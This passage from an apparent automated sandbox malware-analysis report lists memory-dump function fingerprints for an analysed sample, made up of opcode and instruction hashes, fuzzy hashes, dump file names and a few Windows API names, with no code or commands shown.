                                                          • Instruction Fuzzy Hash: EB41073C3866008BC3298F65C8E147677A3EFAA714B68497ED6D647396C77CAC068B04
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c9db21ea2459aacfe3a3d3b1aa1a2a1c2eee496ed6365abe069c39768aa62438
                                                          • Instruction ID: 579d5b16ce76587613173f82801bceac228f5e4c9074940ca599c847a85a22e7
                                                          • Opcode Fuzzy Hash: c9db21ea2459aacfe3a3d3b1aa1a2a1c2eee496ed6365abe069c39768aa62438
                                                          • Instruction Fuzzy Hash: 2041F3B56083908FD320CF64A84072FB7E1FBC5719F550A3EE99497281DBB999018B87
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8f011ef72fb0e4d80f3df78356447a2e8c7ac61ee246e1c4ceb3eac49e17043b
                                                          • Instruction ID: 2c4be59617bd8084c6380483bf84402a8e148dc7db8bb65383c66ae7aec9e4f3
                                                          • Opcode Fuzzy Hash: 8f011ef72fb0e4d80f3df78356447a2e8c7ac61ee246e1c4ceb3eac49e17043b
                                                          • Instruction Fuzzy Hash: EA5107B0504B41AFD360CF39C849797BBE5AB4A320F144A2DE4AE87791D735A405CB96
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2187eb72e3f1fabe01e89da4775b33a08bdca3b004236166017210bfdd80ef90
                                                          • Instruction ID: 1a66bd1616f0fa654ce8f5075db046d6039c731cc7750fa1f0b8b03088e58b95
                                                          • Opcode Fuzzy Hash: 2187eb72e3f1fabe01e89da4775b33a08bdca3b004236166017210bfdd80ef90
                                                          • Instruction Fuzzy Hash: A3312A38B451009BD7298F94CCE15373793EB96318B28447EDA86573D6E73D9C0A8719
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 190d90955352593323db0f56454822f256c104e9dfa138d748ba594f875f77b0
                                                          • Instruction ID: c57d5ca269c73b3d3c66bbe4e0c938deb45da70e2ab25e960f0692798ea24c4c
                                                          • Opcode Fuzzy Hash: 190d90955352593323db0f56454822f256c104e9dfa138d748ba594f875f77b0
                                                          • Instruction Fuzzy Hash: F841F2B02083958FE7108F65A851B5FBBE4FB86B08F110A2DF695AB281C775D501CB5A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d561d4e577aff4640db6ca9fbe7bd82333474a9ca084f160fe617a8ed1355885
                                                          • Instruction ID: ec3ee4965a29eb483853914e20d359d8bcf43fe9425c406f081e20217d719906
                                                          • Opcode Fuzzy Hash: d561d4e577aff4640db6ca9fbe7bd82333474a9ca084f160fe617a8ed1355885
                                                          • Instruction Fuzzy Hash: BC3138386015019FD32A8B25CCA1A377BE2FF56319F68482DD582933E2D77C6C629B49
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8f0c4b9b66733849db2b9eed23813e3a150c713e6f3eaeb56fab0d21798eb86
                                                          • Instruction ID: 79f7f4e77dd58a5f7dbbefa30f094a47f5f7a03851a7117380f377ae6b24f0aa
                                                          • Opcode Fuzzy Hash: e8f0c4b9b66733849db2b9eed23813e3a150c713e6f3eaeb56fab0d21798eb86
                                                          • Instruction Fuzzy Hash: 94312477A107424FC329CB39DC91596B7A3ABC2310319C27DD46693265EF75B426C688
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4de3338a2442dd23b6bd7fb609e32885e1a11ea140783a8bb1cbdd605c20c9f2
                                                          • Instruction ID: 050fa42124f3f46daf63cd84828b6a551105945dc7ffe3fba68fcf268175474a
                                                          • Opcode Fuzzy Hash: 4de3338a2442dd23b6bd7fb609e32885e1a11ea140783a8bb1cbdd605c20c9f2
                                                          • Instruction Fuzzy Hash: 2B313838385200CBD7288B10CCE16363763EFA6308F64067ED686173D6C77C5C02871A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 63fb9cee1c707cdd71164ab7743c8b2674dd602464fccd4c8551d01dce07b2dd
                                                          • Instruction ID: 7d8941836eb4d0cf5520391c3f6c38068f252d5ccd935eeb22236d54b4864dbe
                                                          • Opcode Fuzzy Hash: 63fb9cee1c707cdd71164ab7743c8b2674dd602464fccd4c8551d01dce07b2dd
                                                          • Instruction Fuzzy Hash: A91108367093005BD7209E55DCC063BB657EBDA728F39947EE68417305CF788C018299
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                          • Instruction ID: f0207f3c175e2f7eb559bac18a9e1e4a6c989109a7ad96abab0491fcbda2b84a
                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                          • Instruction Fuzzy Hash: 2D112933B041D40FC3268D3C8500566BFA31BA7234F19539AF4B5AB2D6D6668D8B9359
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 63add9a230e6399eef33deb58eff72e030b1abb6b7467dd7d6058bd84563484d
                                                          • Instruction ID: c2c3caa4eba607ec02c24ce6c21b5f2ee30797fa55a3adfe5fab05ac86fb0ebd
                                                          • Opcode Fuzzy Hash: 63add9a230e6399eef33deb58eff72e030b1abb6b7467dd7d6058bd84563484d
                                                          • Instruction Fuzzy Hash: FB0192B6B1231157D7209E11B4C172FB2A96F60708F58443ED50457381DF79FC098699
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 679be5f6d1f31ba29d0a74b45fcde3079020cd3336088093b56d30cd2d2498de
                                                          • Instruction ID: c20b345d2cbb7f8d38f0c13a4f6f8d7af336a0a686749e904e92d4a46460b2dd
                                                          • Opcode Fuzzy Hash: 679be5f6d1f31ba29d0a74b45fcde3079020cd3336088093b56d30cd2d2498de
                                                          • Instruction Fuzzy Hash: 5CD067E9D40001679206A712BC9397B61394A9364CB44103DF907A6362FB29B159555F
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: AllocString
                                                          • String ID: $"$$$%$&$($*$*$,$.$0$0$1$2$4$6$8$:$<$=$>$?
                                                          • API String ID: 2525500382-2072951861
                                                          • Opcode ID: 0b754370f19d75ca4a4469516617a9b083c273429195c99349636bdfe6cac11f
                                                          • Instruction ID: 8e19ecaa8da9712f0609904da2e2b4264d0ae9bc6d115a7079b4a0c076594083
                                                          • Opcode Fuzzy Hash: 0b754370f19d75ca4a4469516617a9b083c273429195c99349636bdfe6cac11f
                                                          • Instruction Fuzzy Hash: 08A1382160C7D18AE336C63C984879FBED16BE7224F084BAED4E85B2D2D3B54506C767
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: InitVariant
                                                          • String ID: !$#$%$'$($)$C$C$M$P$T$`$`$h$m$r$y${
                                                          • API String ID: 1927566239-2618090201
                                                          • Opcode ID: 6043887bfe4acdd9fd1d2654fe2dae0c881651a0d4f3ad7f97f6702383c55d6c
                                                          • Instruction ID: 1b14b0f98429bc29e25fd47c2420df7ddcda0f0887c26f4c91c9ad49ba9f3316
                                                          • Opcode Fuzzy Hash: 6043887bfe4acdd9fd1d2654fe2dae0c881651a0d4f3ad7f97f6702383c55d6c
                                                          • Instruction Fuzzy Hash: 6C41D37050D7C08EE316CB68D45839BBFD25BE6308F58499DE4C94B382CABA8449CB67
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit
                                                          • String ID: $"$$$&$($*$,$.
                                                          • API String ID: 2610073882-1741189123
                                                          • Opcode ID: 5ad79ab2634e9fe3df2e358658c890efc4b8a354b9aedca02a48e462d8abdbd3
                                                          • Instruction ID: c11783942caa2dee17585e0a966c12244b622c287fd7410d01b20c23b6c2d14f
                                                          • Opcode Fuzzy Hash: 5ad79ab2634e9fe3df2e358658c890efc4b8a354b9aedca02a48e462d8abdbd3
                                                          • Instruction Fuzzy Hash: C331E43050D7C18AD325DB38948864FBFE16B97214F888A9DE1E14B3D6C7B6840ACB97
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: MetricsSystem
                                                          • String ID: Go|&
                                                          • API String ID: 4116985748-898334850
                                                          • Opcode ID: d8c3b9444f7f763b191bc3388f6c72bb1b1b862d7ca66563d04cfbdb886f9f9f
                                                          • Instruction ID: f3c36fca285df6ed61c4820b90c606d27138e20f590784f0eeb22096372c51e6
                                                          • Opcode Fuzzy Hash: d8c3b9444f7f763b191bc3388f6c72bb1b1b862d7ca66563d04cfbdb886f9f9f
                                                          • Instruction Fuzzy Hash: D3815AB00097C18AF370DF11D48979FBBE1FBC5749F618A1E80D86A641D7BA5588CF8A
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID: Wu
                                                          • API String ID: 3664257935-4083010176
                                                          • Opcode ID: ca9ce37597e6a37cbad7b1fbb1ede4322e1c1ed79b09a7689ca17488a61cb0e0
                                                          • Instruction ID: 55532461e1dd4ca4955dc0e45aead4c654ac0ca17622991b842eff44720a9336
                                                          • Opcode Fuzzy Hash: ca9ce37597e6a37cbad7b1fbb1ede4322e1c1ed79b09a7689ca17488a61cb0e0
                                                          • Instruction Fuzzy Hash: 99C01238418000AFEF022F60FE098283E62AB46706B008030BC0080131CB22082EFF4E